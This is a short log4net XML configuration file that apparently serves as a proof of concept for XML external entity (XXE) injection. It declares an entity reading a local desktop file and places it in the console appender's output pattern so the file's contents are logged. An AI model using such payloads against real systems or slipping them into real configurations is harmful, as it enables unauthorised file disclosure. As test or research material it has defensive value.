<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE log4net [
  <!ENTITY xxe SYSTEM "file:///C:/Users/user/Desktop/bob.txt">
]>
<log4net>
  <root>
    <level value="ALL" />
    <appender-ref ref="ConsoleAppender" />
  </root>

  <appender name="ConsoleAppender" type="log4net.Appender.ConsoleAppender, log4net">
    <layout type="log4net.Layout.PatternLayout">
      <!-- Place the XXE reference directly in element content -->
      <conversionPattern>
        XXE Content: &xxe;
      </conversionPattern>
    </layout>
  </appender>
</log4net>
